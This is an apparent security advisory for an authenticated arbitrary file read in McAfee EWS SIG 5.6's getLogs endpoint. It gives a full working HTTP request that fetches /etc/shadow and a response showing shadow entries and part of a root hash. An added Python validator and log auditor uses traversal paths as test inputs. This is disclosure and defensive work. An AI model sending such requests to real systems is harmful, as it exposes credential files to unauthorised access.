McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerability Title: McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

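The application is vulnerable to local file inclusion: the getLogs RPC endpoint returns the contents of whatever path is supplied in the "filename" field of the request body, as the request and response below show for /etc/shadow.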

Exploit:

Request:

POST /scmadmin/29836/cgi-bin/rpc/getLogs/175 HTTP/1.1
Host: 10.10.10.113
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://10.10.10.113/scmadmin/29836/en_US/html/index.html
Content-Length: 42
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dtrouble_reports; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3AD911311E-E496-4807-800C-0790A40AF080
Pragma: no-cache
Cache-Control: no-cache

{"filename":"/etc/shadow","numlines":"25"}

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 02:06:19 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 549
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

[{"errorCode":"0","jobId":"175"},{"out":"daemon:*:11381:0:99999:7:::\nlp:*:11381:0:99999:7:::\nsync:*:11381:0:99999:7:::\nmail:*:11381:0:99999:7:::\nuucp:*:11381:0:99999:7:::\nnobody:*:11381:0:99999:7:::\nrpcuser:!!:11381:0:99999:7:::\nrpc:!!:11381:0:99999:7:::\nroot:$1$/DMw.tf8$43W……
….

Impact: Impact is low, because valid credentials are required to exploit the issue.

Recommendation:

No response from McAfee to the submission.
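
The request above succeeds because the "filename" value is used as supplied. The Python below is an added example, not McAfee's code and not part of the original advisory: it shows the canonicalise-then-compare check a getLogs-style handler needs, and reuses that check to flag suspicious getLogs calls in captured request records. The log directory /var/log, the numlines bound, the function names and the sample records (including job ids 176 and 177) are assumptions made for illustration.

```python
import json
import os
import re

LOG_ROOT = "/var/log"   # assumption: where the appliance's real logs live
MAX_LINES = 1000        # assumption: upper bound accepted for "numlines"
GETLOGS_RE = re.compile(r"/cgi-bin/rpc/getLogs/\d+$")

def validate_getlogs_body(body, log_root=LOG_ROOT):
    """Return (ok, detail) for a getLogs JSON body like the one shown above."""
    try:
        params = json.loads(body)
        filename, numlines = params["filename"], int(params["numlines"])
    except (ValueError, KeyError, TypeError):
        return False, "malformed body"
    if not isinstance(filename, str) or "\x00" in filename:
        return False, "bad filename"
    # Canonicalise before comparing, so absolute paths, ".." and symlinks
    # cannot step outside the log directory.
    root = os.path.realpath(log_root)
    target = os.path.realpath(os.path.join(root, filename))
    if target == root or os.path.commonpath([root, target]) != root:
        return False, "outside log root: " + target
    if not 1 <= numlines <= MAX_LINES:
        return False, "numlines out of range"
    return True, target

def audit(records):
    """Return (client, detail) for each getLogs call that fails validation."""
    flagged = []
    for client, url_path, body in records:
        if GETLOGS_RE.search(url_path):
            ok, detail = validate_getlogs_body(body)
            if not ok:
                flagged.append((client, detail))
    return flagged

# Constructed sample records: (client address, request path, request body).
SAMPLE = [
    ("192.0.2.10", "/scmadmin/29836/cgi-bin/rpc/getLogs/175",
     '{"filename":"/etc/shadow","numlines":"25"}'),
    ("192.0.2.11", "/scmadmin/29836/cgi-bin/rpc/getLogs/176",
     '{"filename":"example.log","numlines":"25"}'),
    ("192.0.2.12", "/scmadmin/29836/cgi-bin/rpc/getLogs/177",
     '{"filename":"../../etc/passwd","numlines":"25"}'),
]

if __name__ == "__main__":
    for client, detail in audit(SAMPLE):
        print(client, detail)
```

Comparing canonical paths component by component (os.path.commonpath) rather than with a string prefix test also rejects sibling directories such as /var/log2.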

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.